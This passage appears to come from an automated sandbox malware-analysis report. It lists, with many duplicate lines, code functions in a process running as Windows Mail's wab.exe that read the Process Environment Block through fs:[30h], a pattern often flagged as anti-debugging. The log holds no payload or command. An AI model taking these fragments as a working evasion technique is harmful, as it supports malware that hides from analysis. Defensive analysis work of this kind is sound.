Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 mov eax, dword ptr fs:[00000030h] 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C0F0 mov eax, dword ptr fs:[00000030h] 11_2_2011C0F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201620F0 mov ecx, dword ptr fs:[00000030h] 11_2_201620F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201450E4 mov eax, dword ptr fs:[00000030h] 11_2_201450E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201450E4 mov ecx, dword ptr fs:[00000030h] 11_2_201450E4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A0E3 mov ecx, dword ptr fs:[00000030h] 11_2_2011A0E3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201280E9 mov eax, dword ptr fs:[00000030h] 11_2_201280E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 mov ecx, dword ptr fs:[00000030h] 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 mov eax, dword ptr fs:[00000030h] 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 mov eax, dword ptr fs:[00000030h] 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 mov eax, dword ptr fs:[00000030h] 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E0115 mov eax, dword ptr fs:[00000030h] 11_2_201E0115
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121131 mov eax, dword ptr fs:[00000030h] 11_2_20121131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121131 mov eax, dword ptr fs:[00000030h] 11_2_20121131
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B136 mov eax, dword ptr fs:[00000030h] 11_2_2011B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B136 mov eax, dword ptr fs:[00000030h] 11_2_2011B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B136 mov eax, dword ptr fs:[00000030h] 11_2_2011B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B136 mov eax, dword ptr fs:[00000030h] 11_2_2011B136
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20150124 mov eax, dword ptr fs:[00000030h] 11_2_20150124
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20127152 mov eax, dword ptr fs:[00000030h] 11_2_20127152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20126154 mov eax, dword ptr fs:[00000030h] 11_2_20126154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20126154 mov eax, dword ptr fs:[00000030h] 11_2_20126154
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C156 mov eax, dword ptr fs:[00000030h] 11_2_2011C156
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5152 mov eax, dword ptr fs:[00000030h] 11_2_201F5152
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119148 mov eax, dword ptr fs:[00000030h] 11_2_20119148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119148 mov eax, dword ptr fs:[00000030h] 11_2_20119148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119148 mov eax, dword ptr fs:[00000030h] 11_2_20119148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119148 mov eax, dword ptr fs:[00000030h] 11_2_20119148
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov eax, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov eax, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov ecx, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov eax, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B4144 mov eax, dword ptr fs:[00000030h] 11_2_201B4144
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B9179 mov eax, dword ptr fs:[00000030h] 11_2_201B9179
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 mov eax, dword ptr fs:[00000030h] 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A019F mov eax, dword ptr fs:[00000030h] 11_2_201A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A019F mov eax, dword ptr fs:[00000030h] 11_2_201A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A019F mov eax, dword ptr fs:[00000030h] 11_2_201A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A019F mov eax, dword ptr fs:[00000030h] 11_2_201A019F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A197 mov eax, dword ptr fs:[00000030h] 11_2_2011A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A197 mov eax, dword ptr fs:[00000030h] 11_2_2011A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A197 mov eax, dword ptr fs:[00000030h] 11_2_2011A197
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20160185 mov eax, dword ptr fs:[00000030h] 11_2_20160185
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DC188 mov eax, dword ptr fs:[00000030h] 11_2_201DC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DC188 mov eax, dword ptr fs:[00000030h] 11_2_201DC188
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013B1B0 mov eax, dword ptr fs:[00000030h] 11_2_2013B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D11A4 mov eax, dword ptr fs:[00000030h] 11_2_201D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D11A4 mov eax, dword ptr fs:[00000030h] 11_2_201D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D11A4 mov eax, dword ptr fs:[00000030h] 11_2_201D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D11A4 mov eax, dword ptr fs:[00000030h] 11_2_201D11A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015D1D0 mov eax, dword ptr fs:[00000030h] 11_2_2015D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015D1D0 mov ecx, dword ptr fs:[00000030h] 11_2_2015D1D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F51CB mov eax, dword ptr fs:[00000030h] 11_2_201F51CB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E61C3 mov eax, dword ptr fs:[00000030h] 11_2_201E61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E61C3 mov eax, dword ptr fs:[00000030h] 11_2_201E61C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201501F8 mov eax, dword ptr fs:[00000030h] 11_2_201501F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F61E5 mov eax, dword ptr fs:[00000030h] 11_2_201F61E5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201451EF mov eax, dword ptr fs:[00000030h] 11_2_201451EF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201251ED mov eax, dword ptr fs:[00000030h] 11_2_201251ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20157208 mov eax, dword ptr fs:[00000030h] 11_2_20157208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20157208 mov eax, dword ptr fs:[00000030h] 11_2_20157208
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011823B mov eax, dword ptr fs:[00000030h] 11_2_2011823B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5227 mov eax, dword ptr fs:[00000030h] 11_2_201F5227
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011A250 mov eax, dword ptr fs:[00000030h] 11_2_2011A250
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DB256 mov eax, dword ptr fs:[00000030h] 11_2_201DB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DB256 mov eax, dword ptr fs:[00000030h] 11_2_201DB256
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20126259 mov eax, dword ptr fs:[00000030h] 11_2_20126259
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119240 mov eax, dword ptr fs:[00000030h] 11_2_20119240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119240 mov eax, dword ptr fs:[00000030h] 11_2_20119240
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015724D mov eax, dword ptr fs:[00000030h] 11_2_2015724D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20149274 mov eax, dword ptr fs:[00000030h] 11_2_20149274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20161270 mov eax, dword ptr fs:[00000030h] 11_2_20161270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20161270 mov eax, dword ptr fs:[00000030h] 11_2_20161270
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 mov eax, dword ptr fs:[00000030h] 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20124260 mov eax, dword ptr fs:[00000030h] 11_2_20124260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20124260 mov eax, dword ptr fs:[00000030h] 11_2_20124260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20124260 mov eax, dword ptr fs:[00000030h] 11_2_20124260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201ED26B mov eax, dword ptr fs:[00000030h] 11_2_201ED26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201ED26B mov eax, dword ptr fs:[00000030h] 11_2_201ED26B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011826B mov eax, dword ptr fs:[00000030h] 11_2_2011826B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015329E mov eax, dword ptr fs:[00000030h] 11_2_2015329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015329E mov eax, dword ptr fs:[00000030h] 11_2_2015329E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E284 mov eax, dword ptr fs:[00000030h] 11_2_2015E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E284 mov eax, dword ptr fs:[00000030h] 11_2_2015E284
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A0283 mov eax, dword ptr fs:[00000030h] 11_2_201A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A0283 mov eax, dword ptr fs:[00000030h] 11_2_201A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A0283 mov eax, dword ptr fs:[00000030h] 11_2_201A0283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F5283 mov eax, dword ptr fs:[00000030h] 11_2_201F5283
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A92BC mov eax, dword ptr fs:[00000030h] 11_2_201A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A92BC mov eax, dword ptr fs:[00000030h] 11_2_201A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A92BC mov ecx, dword ptr fs:[00000030h] 11_2_201A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A92BC mov ecx, dword ptr fs:[00000030h] 11_2_201A92BC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 mov eax, dword ptr fs:[00000030h] 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 mov eax, dword ptr fs:[00000030h] 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 mov eax, dword ptr fs:[00000030h] 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 mov eax, dword ptr fs:[00000030h] 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E92A6 mov eax, dword ptr fs:[00000030h] 11_2_201E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E92A6 mov eax, dword ptr fs:[00000030h] 11_2_201E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E92A6 mov eax, dword ptr fs:[00000030h] 11_2_201E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E92A6 mov eax, dword ptr fs:[00000030h] 11_2_201E92A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B72A0 mov eax, dword ptr fs:[00000030h] 11_2_201B72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B72A0 mov eax, dword ptr fs:[00000030h] 11_2_201B72A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov ecx, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201B62A0 mov eax, dword ptr fs:[00000030h] 11_2_201B62A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B2D3 mov eax, dword ptr fs:[00000030h] 11_2_2011B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B2D3 mov eax, dword ptr fs:[00000030h] 11_2_2011B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011B2D3 mov eax, dword ptr fs:[00000030h] 11_2_2011B2D3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F2D0 mov eax, dword ptr fs:[00000030h] 11_2_2014F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F2D0 mov eax, dword ptr fs:[00000030h] 11_2_2014F2D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012A2C3 mov eax, dword ptr fs:[00000030h] 11_2_2012A2C3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 mov eax, dword ptr fs:[00000030h] 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201292C5 mov eax, dword ptr fs:[00000030h] 11_2_201292C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201292C5 mov eax, dword ptr fs:[00000030h] 11_2_201292C5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF2F8 mov eax, dword ptr fs:[00000030h] 11_2_201DF2F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201192FF mov eax, dword ptr fs:[00000030h] 11_2_201192FF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED mov eax, dword ptr fs:[00000030h] 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201302E1 mov eax, dword ptr fs:[00000030h] 11_2_201302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201302E1 mov eax, dword ptr fs:[00000030h] 11_2_201302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201302E1 mov eax, dword ptr fs:[00000030h] 11_2_201302E1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F52E2 mov eax, dword ptr fs:[00000030h] 11_2_201F52E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011C310 mov ecx, dword ptr fs:[00000030h] 11_2_2011C310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20140310 mov ecx, dword ptr fs:[00000030h] 11_2_20140310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A930B mov eax, dword ptr fs:[00000030h] 11_2_201A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A930B mov eax, dword ptr fs:[00000030h] 11_2_201A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A930B mov eax, dword ptr fs:[00000030h] 11_2_201A930B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A30B mov eax, dword ptr fs:[00000030h] 11_2_2015A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A30B mov eax, dword ptr fs:[00000030h] 11_2_2015A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015A30B mov eax, dword ptr fs:[00000030h] 11_2_2015A30B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20117330 mov eax, dword ptr fs:[00000030h] 11_2_20117330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E132D mov eax, dword ptr fs:[00000030h] 11_2_201E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E132D mov eax, dword ptr fs:[00000030h] 11_2_201E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014F32A mov eax, dword ptr fs:[00000030h] 11_2_2014F32A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119353 mov eax, dword ptr fs:[00000030h] 11_2_20119353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20119353 mov eax, dword ptr fs:[00000030h] 11_2_20119353
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov ecx, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A035C mov eax, dword ptr fs:[00000030h] 11_2_201A035C
